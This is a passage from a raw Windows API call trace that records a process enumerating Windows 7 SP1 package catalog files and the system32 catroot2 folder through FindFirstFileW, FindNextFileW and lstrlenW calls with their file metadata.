(lpString="Microsoft-Windows-Branding-Professional-Client-Package~31bf3856ad364e35~amd64~~6.1.7601.17514.cat") returned 97 [0027.736] FindNextFileW (in: hFindFile=0x45a230, lpFindFileData=0x459fd8 | out: lpFindFileData=0x459fd8*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x58423330, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0x58423330, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xb67bec00, ftLastWriteTime.dwHighDateTime=0x1cb88f9, nFileSizeHigh=0x0, nFileSizeLow=0x2172, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft-Windows-Branding-Ultimate-Client-Package~31bf3856ad364e35~amd64~en-US~6.1.7601.17514.cat", cAlternateFileName="MI1A80~1.CAT")) returned 1 [0027.736] lstrlenW (lpString="Microsoft-Windows-Branding-Ultimate-Client-Package~31bf3856ad364e35~amd64~en-US~6.1.7601.17514.cat") returned 98 [0027.736] FindNextFileW (in: hFindFile=0x45a230, lpFindFileData=0x459fd8 | out: lpFindFileData=0x459fd8*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x413a02a9, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0x413a02a9, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0x516cca00, ftLastWriteTime.dwHighDateTime=0x1cb88ea, nFileSizeHigh=0x0, nFileSizeLow=0x5474, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft-Windows-Branding-Ultimate-Client-Package~31bf3856ad364e35~amd64~~6.1.7601.17514.cat", cAlternateFileName="MI4C0D~1.CAT")) returned 1 [0027.736] lstrlenW (lpString="Microsoft-Windows-Branding-Ultimate-Client-Package~31bf3856ad364e35~amd64~~6.1.7601.17514.cat") returned 93 [0027.736] FindNextFileW (in: hFindFile=0x45a230, lpFindFileData=0x459fd8 | out: lpFindFileData=0x459fd8*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x5f68b563, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0x5f68b563, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0x56397a00, ftLastWriteTime.dwHighDateTime=0x1cb88fa, nFileSizeHigh=0x0, nFileSizeLow=0x350c, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft-Windows-BusinessScanning-Feature-Package~31bf3856ad364e35~amd64~en-US~6.1.7601.17514.cat", cAlternateFileName="MICA05~1.CAT")) returned 1 [0027.736] lstrlenW (lpString="Microsoft-Windows-BusinessScanning-Feature-Package~31bf3856ad364e35~amd64~en-US~6.1.7601.17514.cat") returned 98 [0027.736] FindNextFileW (in: hFindFile=0x45a230, lpFindFileData=0x459fd8 | out: lpFindFileData=0x459fd8*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x33724b53, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0x33724b53, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0x516cca00, ftLastWriteTime.dwHighDateTime=0x1cb88ea, nFileSizeHigh=0x0, nFileSizeLow=0x4ab2, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft-Windows-BusinessScanning-Feature-Package~31bf3856ad364e35~amd64~~6.1.7601.17514.cat", cAlternateFileName="MI3285~1.CAT")) returned 1 [0027.736] lstrlenW (lpString="Microsoft-Windows-BusinessScanning-Feature-Package~31bf3856ad364e35~amd64~~6.1.7601.17514.cat") returned 93 [0027.736] FindNextFileW (in: hFindFile=0x45a230, lpFindFileData=0x459fd8 | out: lpFindFileData=0x459fd8*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x5560489b, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0x5560489b, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0x14a8cf00, ftLastWriteTime.dwHighDateTime=0x1cb88fa, nFileSizeHigh=0x0, nFileSizeLow=0x22f5d, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft-Windows-Client-Drivers-Package~31bf3856ad364e35~amd64~en-US~6.1.7601.17514.cat", cAlternateFileName="MIA162~1.CAT")) returned 1 [0027.736] lstrlenW (lpString="Microsoft-Windows-Client-Drivers-Package~31bf3856ad364e35~amd64~en-US~6.1.7601.17514.cat") returned 88 [0027.736] FindNextFileW (in: hFindFile=0x45a230, lpFindFileData=0x459fd8 | out: lpFindFileData=0x459fd8*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x33286e5, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0x33286e5, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0x14a0d300, ftLastWriteTime.dwHighDateTime=0x1cb88ea, nFileSizeHigh=0x0, nFileSizeLow=0x9b12a, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft-Windows-Client-Drivers-Package~31bf3856ad364e35~amd64~~6.1.7601.17514.cat", cAlternateFileName="MI5C68~1.CAT")) returned 1 [0027.736] lstrlenW (lpString="Microsoft-Windows-Client-Drivers-Package~31bf3856ad364e35~amd64~~6.1.7601.17514.cat") returned 83 [0027.736] FindNextFileW (in: hFindFile=0x45a230, lpFindFileData=0x459fd8 | out: lpFindFileData=0x459fd8*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x5dfa2178, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0x5dfa2178, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0x170b2900, ftLastWriteTime.dwHighDateTime=0x1cb88fa, nFileSizeHigh=0x0, nFileSizeLow=0x6901f, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft-Windows-Client-Features-Package~31bf3856ad364e35~amd64~en-US~6.1.7601.17514.cat", cAlternateFileName="MI1B4B~1.CAT")) returned 1 [0027.736] lstrlenW (lpString="Microsoft-Windows-Client-Features-Package~31bf3856ad364e35~amd64~en-US~6.1.7601.17514.cat") returned 89 [0027.736] FindNextFileW (in: hFindFile=0x45a230, lpFindFileData=0x459fd8 | out: lpFindFileData=0x459fd8*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x1bebf1de, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0x1bebf1de, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0x15d20000, ftLastWriteTime.dwHighDateTime=0x1cb88ea, nFileSizeHigh=0x0, nFileSizeLow=0xd62d1, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft-Windows-Client-Features-Package~31bf3856ad364e35~amd64~~6.1.7601.17514.cat", cAlternateFileName="MI5116~1.CAT")) returned 1 [0027.736] lstrlenW (lpString="Microsoft-Windows-Client-Features-Package~31bf3856ad364e35~amd64~~6.1.7601.17514.cat") returned 84 [0027.736] FindNextFileW (in: hFindFile=0x45a230, lpFindFileData=0x459fd8 | out: lpFindFileData=0x459fd8*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x4257a7ca, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0x4257a7ca, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0x92b8a600, ftLastWriteTime.dwHighDateTime=0x1cb88f9, nFileSizeHigh=0x0, nFileSizeLow=0x1ce2, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft-Windows-Client-LanguagePack-Package-wrapper~31bf3856ad364e35~amd64~en-US~6.1.7601.17514.cat", cAlternateFileName="MI928B~1.CAT")) returned 1 [0027.736] lstrlenW (lpString="Microsoft-Windows-Client-LanguagePack-Package-wrapper~31bf3856ad364e35~amd64~en-US~6.1.7601.17514.cat") returned 101 [0027.736] FindNextFileW (in: hFindFile=0x45a230, lpFindFileData=0x459fd8 | out: lpFindFileData=0x459fd8*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x42612d4b, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0x42612d4b, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0x32296900, ftLastWriteTime.dwHighDateTime=0x1cb88f9, nFileSizeHigh=0x0, nFileSizeLow=0x1ce2, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft-Windows-Client-LanguagePack-Package~31bf3856ad364e35~amd64~en-US~6.1.7601.17514.cat", cAlternateFileName="MICFFA~1.CAT")) returned 1 [0027.736] lstrlenW (lpString="Microsoft-Windows-Client-LanguagePack-Package~31bf3856ad364e35~amd64~en-US~6.1.7601.17514.cat") returned 93 [0027.737] FindNextFileW (in: hFindFile=0x45a230, lpFindFileData=0x459fd8 | out: lpFindFileData=0x459fd8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5039036, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x5039036, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x6c950500, ftLastWriteTime.dwHighDateTime=0x1cb88fd, nFileSizeHigh=0x0, nFileSizeLow=0x1ce2, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft-Windows-Client-Refresh-LanguagePack-Package~31bf3856ad364e35~amd64~en-US~6.1.7601.17514.cat", cAlternateFileName="MID6B3~1.CAT")) returned 1 [0027.737] lstrlenW (lpString="Microsoft-Windows-Client-Refresh-LanguagePack-Package~31bf3856ad364e35~amd64~en-US~6.1.7601.17514.cat") returned 101 [0027.737] FindNextFileW (in: hFindFile=0x45a230, lpFindFileData=0x459fd8 | out: lpFindFileData=0x459fd8*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x56cc7b25, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0x56cc7b25, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xba0f7300, ftLastWriteTime.dwHighDateTime=0x1cb88f9, nFileSizeHigh=0x0, nFileSizeLow=0x2836, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft-Windows-Client-Wired-Network-Drivers-Package~31bf3856ad364e35~amd64~en-US~6.1.7601.17514.cat", cAlternateFileName="MI2A57~1.CAT")) returned 1 [0027.737] lstrlenW (lpString="Microsoft-Windows-Client-Wired-Network-Drivers-Package~31bf3856ad364e35~amd64~en-US~6.1.7601.17514.cat") returned 102 [0027.737] FindNextFileW (in: hFindFile=0x45a230, lpFindFileData=0x459fd8 | out: lpFindFileData=0x459fd8*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x60faeba, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0x60faeba, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0x110d4c00, ftLastWriteTime.dwHighDateTime=0x1cb88ea, nFileSizeHigh=0x0, nFileSizeLow=0x284e, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft-Windows-Client-Wired-Network-Drivers-Package~31bf3856ad364e35~amd64~~6.1.7601.17514.cat", cAlternateFileName="MIE8C6~1.CAT")) returned 1 [0027.737] lstrlenW (lpString="Microsoft-Windows-Client-Wired-Network-Drivers-Package~31bf3856ad364e35~amd64~~6.1.7601.17514.cat") returned 97 [0027.737] FindNextFileW (in: hFindFile=0x45a230, lpFindFileData=0x459fd8 | out: lpFindFileData=0x459fd8*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x641146cc, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0x641146cc, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0x276ed400, ftLastWriteTime.dwHighDateTime=0x1cb88f9, nFileSizeHigh=0x0, nFileSizeLow=0x2172, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft-Windows-ClipsInTheLibrary-Package~31bf3856ad364e35~amd64~en-US~6.1.7601.17514.cat", cAlternateFileName="MICA07~1.CAT")) returned 1 [0027.737] lstrlenW (lpString="Microsoft-Windows-ClipsInTheLibrary-Package~31bf3856ad364e35~amd64~en-US~6.1.7601.17514.cat") returned 91 [0027.737] FindNextFileW (in: hFindFile=0x45a230, lpFindFileData=0x459fd8 | out: lpFindFileData=0x459fd8*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x2c9f194a, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0x2c9f194a, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xae1bb500, ftLastWriteTime.dwHighDateTime=0x1cb88e9, nFileSizeHigh=0x0, nFileSizeLow=0x2846, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft-Windows-ClipsInTheLibrary-Package~31bf3856ad364e35~amd64~~6.1.7601.17514.cat", cAlternateFileName="MI5A20~1.CAT")) returned 1 [0027.737] lstrlenW (lpString="Microsoft-Windows-ClipsInTheLibrary-Package~31bf3856ad364e35~amd64~~6.1.7601.17514.cat") returned 86 [0027.737] FindNextFileW (in: hFindFile=0x45a230, lpFindFileData=0x459fd8 | out: lpFindFileData=0x459fd8*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x3a0c5c56, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0x3a0c5c56, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xba077700, ftLastWriteTime.dwHighDateTime=0x1cb88e9, nFileSizeHigh=0x0, nFileSizeLow=0x3288, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft-Windows-CodecPack-Basic-Encoder-Package~31bf3856ad364e35~amd64~~6.1.7601.17514.cat", cAlternateFileName="MIE32A~1.CAT")) returned 1 [0027.737] lstrlenW (lpString="Microsoft-Windows-CodecPack-Basic-Encoder-Package~31bf3856ad364e35~amd64~~6.1.7601.17514.cat") returned 92 [0027.737] FindNextFileW (in: hFindFile=0x45a230, lpFindFileData=0x459fd8 | out: lpFindFileData=0x459fd8*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x420457a0, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0x420457a0, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0x3f05d00, ftLastWriteTime.dwHighDateTime=0x1cb88ea, nFileSizeHigh=0x0, nFileSizeLow=0x1ce2, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft-Windows-CodecPack-Basic-Package-wrapper~31bf3856ad364e35~amd64~~6.1.7601.17514.cat", cAlternateFileName="MIB8B4~1.CAT")) returned 1 [0027.737] lstrlenW (lpString="Microsoft-Windows-CodecPack-Basic-Package-wrapper~31bf3856ad364e35~amd64~~6.1.7601.17514.cat") returned 92 [0027.737] FindNextFileW (in: hFindFile=0x45a230, lpFindFileData=0x459fd8 | out: lpFindFileData=0x459fd8*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x5e06085a, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0x5e06085a, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xc03c900, ftLastWriteTime.dwHighDateTime=0x1cb88f9, nFileSizeHigh=0x0, nFileSizeLow=0x23be, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft-Windows-CodecPack-Basic-Package~31bf3856ad364e35~amd64~en-US~6.1.7601.17514.cat", cAlternateFileName="MIC384~1.CAT")) returned 1 [0027.737] lstrlenW (lpString="Microsoft-Windows-CodecPack-Basic-Package~31bf3856ad364e35~amd64~en-US~6.1.7601.17514.cat") returned 89 [0027.737] FindNextFileW (in: hFindFile=0x45a230, lpFindFileData=0x459fd8 | out: lpFindFileData=0x459fd8*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x39f6eff3, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0x39f6eff3, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0x3f05d00, ftLastWriteTime.dwHighDateTime=0x1cb88ea, nFileSizeHigh=0x0, nFileSizeLow=0xe621, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft-Windows-CodecPack-Basic-Package~31bf3856ad364e35~amd64~~6.1.7601.17514.cat", cAlternateFileName="MIC5BA~1.CAT")) returned 1 [0027.737] lstrlenW (lpString="Microsoft-Windows-CodecPack-Basic-Package~31bf3856ad364e35~amd64~~6.1.7601.17514.cat") returned 84 [0027.737] FindNextFileW (in: hFindFile=0x45a230, lpFindFileData=0x459fd8 | out: lpFindFileData=0x459fd8*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x567dedbc, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0x567dedbc, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0x145c0400, ftLastWriteTime.dwHighDateTime=0x1cb88f9, nFileSizeHigh=0x0, nFileSizeLow=0x19ad9, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft-Windows-Common-Drivers-Package~31bf3856ad364e35~amd64~en-US~6.1.7601.17514.cat", cAlternateFileName="MIE7EE~1.CAT")) returned 1 [0027.737] lstrlenW (lpString="Microsoft-Windows-Common-Drivers-Package~31bf3856ad364e35~amd64~en-US~6.1.7601.17514.cat") returned 88 [0027.737] FindNextFileW (in: hFindFile=0x45a230, lpFindFileData=0x459fd8 | out: lpFindFileData=0x459fd8*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x47b04cb, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0x47b04cb, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0x516cca00, ftLastWriteTime.dwHighDateTime=0x1cb88ea, nFileSizeHigh=0x0, nFileSizeLow=0x2209b, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft-Windows-Common-Drivers-Package~31bf3856ad364e35~amd64~~6.1.7601.17514.cat", cAlternateFileName="MI24C9~1.CAT")) returned 1 [0027.738] lstrlenW (lpString="Microsoft-Windows-Common-Drivers-Package~31bf3856ad364e35~amd64~~6.1.7601.17514.cat") returned 83 [0027.738] FindNextFileW (in: hFindFile=0x45a230, lpFindFileData=0x459fd8 | out: lpFindFileData=0x459fd8*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x56c55704, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0x56c55704, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0x47eb5e00, ftLastWriteTime.dwHighDateTime=0x1cb88fa, nFileSizeHigh=0x0, nFileSizeLow=0x5a4e, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft-Windows-Common-Modem-Drivers-Package~31bf3856ad364e35~amd64~en-US~6.1.7601.17514.cat", cAlternateFileName="MI4862~1.CAT")) returned 1 [0027.738] lstrlenW (lpString="Microsoft-Windows-Common-Modem-Drivers-Package~31bf3856ad364e35~amd64~en-US~6.1.7601.17514.cat") returned 94 [0027.738] FindNextFileW (in: hFindFile=0x45a230, lpFindFileData=0x459fd8 | out: lpFindFileData=0x459fd8*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x6062939, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0x6062939, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xb673f000, ftLastWriteTime.dwHighDateTime=0x1cb88e9, nFileSizeHigh=0x0, nFileSizeLow=0x1a933, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft-Windows-Common-Modem-Drivers-Package~31bf3856ad364e35~amd64~~6.1.7601.17514.cat", cAlternateFileName="MIC1F3~1.CAT")) returned 1 [0027.738] lstrlenW (lpString="Microsoft-Windows-Common-Modem-Drivers-Package~31bf3856ad364e35~amd64~~6.1.7601.17514.cat") returned 89 [0027.738] FindNextFileW (in: hFindFile=0x45a230, lpFindFileData=0x459fd8 | out: lpFindFileData=0x459fd8*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x33b02f1a, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0x33b02f1a, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xacea8800, ftLastWriteTime.dwHighDateTime=0x1cb88e9, nFileSizeHigh=0x0, nFileSizeLow=0x2172, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft-Windows-DesktopWindowManager-uDWM-Package~31bf3856ad364e35~amd64~~6.1.7601.17514.cat", cAlternateFileName="MIDC5E~1.CAT")) returned 1 [0027.738] lstrlenW (lpString="Microsoft-Windows-DesktopWindowManager-uDWM-Package~31bf3856ad364e35~amd64~~6.1.7601.17514.cat") returned 94 [0027.738] FindNextFileW (in: hFindFile=0x45a230, lpFindFileData=0x459fd8 | out: lpFindFileData=0x459fd8*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x709542fd, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0x709542fd, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0x9c420e00, ftLastWriteTime.dwHighDateTime=0x1cb88f9, nFileSizeHigh=0x0, nFileSizeLow=0x23be, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft-Windows-Disk-Diagnosis-Package~31bf3856ad364e35~amd64~en-US~6.1.7601.17514.cat", cAlternateFileName="MI884F~1.CAT")) returned 1 [0027.738] lstrlenW (lpString="Microsoft-Windows-Disk-Diagnosis-Package~31bf3856ad364e35~amd64~en-US~6.1.7601.17514.cat") returned 88 [0027.738] FindNextFileW (in: hFindFile=0x45a230, lpFindFileData=0x459fd8 | out: lpFindFileData=0x459fd8*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x33bc15fc, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0x33bc15fc, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xa4924d00, ftLastWriteTime.dwHighDateTime=0x1cb88e9, nFileSizeHigh=0x0, nFileSizeLow=0x2602, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft-Windows-Disk-Diagnosis-Package~31bf3856ad364e35~amd64~~6.1.7601.17514.cat", cAlternateFileName="MI5892~1.CAT")) returned 1 [0027.738] lstrlenW (lpString="Microsoft-Windows-Disk-Diagnosis-Package~31bf3856ad364e35~amd64~~6.1.7601.17514.cat") returned 83 [0027.738] FindNextFileW (in: hFindFile=0x45a230, lpFindFileData=0x459fd8 | out: lpFindFileData=0x459fd8*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x348ff074, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0x348ff074, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0x123e7900, ftLastWriteTime.dwHighDateTime=0x1cb88ea, nFileSizeHigh=0x0, nFileSizeLow=0x2cbe, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft-Windows-Editions-Client-Package~31bf3856ad364e35~amd64~~6.1.7601.17514.cat", cAlternateFileName="MIC479~1.CAT")) returned 1 [0027.738] lstrlenW (lpString="Microsoft-Windows-Editions-Client-Package~31bf3856ad364e35~amd64~~6.1.7601.17514.cat") returned 84 [0027.738] FindNextFileW (in: hFindFile=0x45a230, lpFindFileData=0x459fd8 | out: lpFindFileData=0x459fd8*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0xe4136930, ftCreationTime.dwHighDateTime=0x1cb892a, ftLastAccessTime.dwLowDateTime=0xe4136930, ftLastAccessTime.dwHighDateTime=0x1cb892a, ftLastWriteTime.dwLowDateTime=0x56317e00, ftLastWriteTime.dwHighDateTime=0x1cb88ea, nFileSizeHigh=0x0, nFileSizeLow=0x1ce2, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft-Windows-EnterpriseEdition-wrapper~31bf3856ad364e35~amd64~~6.1.7601.17514.cat", cAlternateFileName="MIEF23~1.CAT")) returned 1 [0027.738] lstrlenW (lpString="Microsoft-Windows-EnterpriseEdition-wrapper~31bf3856ad364e35~amd64~~6.1.7601.17514.cat") returned 86 [0027.738] FindNextFileW (in: hFindFile=0x45a230, lpFindFileData=0x459fd8 | out: lpFindFileData=0x459fd8*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x1188fe7, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0x1188fe7, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0x55005100, ftLastWriteTime.dwHighDateTime=0x1cb88ea, nFileSizeHigh=0x0, nFileSizeLow=0x39463e, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft-Windows-Foundation-Package~31bf3856ad364e35~amd64~~6.1.7601.17514.cat", cAlternateFileName="MID8CB~1.CAT")) returned 1 [0027.738] lstrlenW (lpString="Microsoft-Windows-Foundation-Package~31bf3856ad364e35~amd64~~6.1.7601.17514.cat") returned 79 [0027.739] lstrlenW (lpString="Microsoft-Windows-Gadget-Platform-Package~31bf3856ad364e35~amd64~en-US~6.1.7601.17514.cat") returned 89 [0027.739] lstrlenW (lpString="Microsoft-Windows-Gadget-Platform-Package~31bf3856ad364e35~amd64~~6.1.7601.17514.cat") returned 84 [0027.739] lstrlenW (lpString="Microsoft-Windows-GPUPipeline-Package~31bf3856ad364e35~amd64~en-US~6.1.7601.17514.cat") returned 85 [0027.739] lstrlenW (lpString="Microsoft-Windows-GPUPipeline-Package~31bf3856ad364e35~amd64~~6.1.7601.17514.cat") returned 80 [0027.739] lstrlenW (lpString="Microsoft-Windows-GroupPolicy-ClientExtensions-Package~31bf3856ad364e35~amd64~en-US~6.1.7601.17514.cat") returned 102 [0027.739] lstrlenW (lpString="Microsoft-Windows-GroupPolicy-ClientExtensions-Package~31bf3856ad364e35~amd64~~6.1.7601.17514.cat") returned 97 [0027.739] lstrlenW (lpString="Microsoft-Windows-GroupPolicy-ClientTools-Package~31bf3856ad364e35~amd64~en-US~6.1.7601.17514.cat") returned 97 [0027.739] lstrlenW (lpString="Microsoft-Windows-GroupPolicy-ClientTools-Package~31bf3856ad364e35~amd64~~6.1.7601.17514.cat") returned 92 [0027.740] lstrlenW (lpString="Microsoft-Windows-Help-CoreClientUAPS-Package~31bf3856ad364e35~amd64~en-US~6.1.7601.17514.cat") returned 93 [0027.740] lstrlenW (lpString="Microsoft-Windows-Help-CoreClientUAPS-Package~31bf3856ad364e35~amd64~~6.1.7601.17514.cat") returned 88 [0027.740] lstrlenW (lpString="Microsoft-Windows-Help-CoreClientUAUE-Package~31bf3856ad364e35~amd64~en-US~6.1.7601.17514.cat") returned 93 [0027.740] lstrlenW (lpString="Microsoft-Windows-Help-CoreClientUAUE-Package~31bf3856ad364e35~amd64~~6.1.7601.17514.cat") returned 88 [0027.740] lstrlenW (lpString="Microsoft-Windows-Help-Customization-Package~31bf3856ad364e35~amd64~en-US~6.1.7601.17514.cat") returned 92 [0027.742] FindClose (in: hFindFile=0x45a230 | out: hFindFile=0x45a230) returned 1 [0027.742] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x459fd8 | out: hHeap=0x420000) returned 1 [0027.742] FindClose (in: hFindFile=0x44e188 | out: hFindFile=0x44e188) returned 1 [0027.742] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x458d78 | out: hHeap=0x420000) returned 1 [0027.742] RtlAllocateHeap (HeapHandle=0x420000, Flags=0x0, Size=0x250) returned 0x458d78 [0027.742] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\catroot2\\*", lpFindFileData=0x458d78 | out: lpFindFileData=0x458d78*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfecc0852, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x486905c0, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0x486905c0, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x44e188 [0027.742] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\catroot2\\{127D0A1D-4EF2-11D1-8608-00C04FC295EE}\\*", lpFindFileData=0x459fd8 | out: lpFindFileData=0x459fd8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x76ceddac, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x76ceddac, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x76ceddac, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, 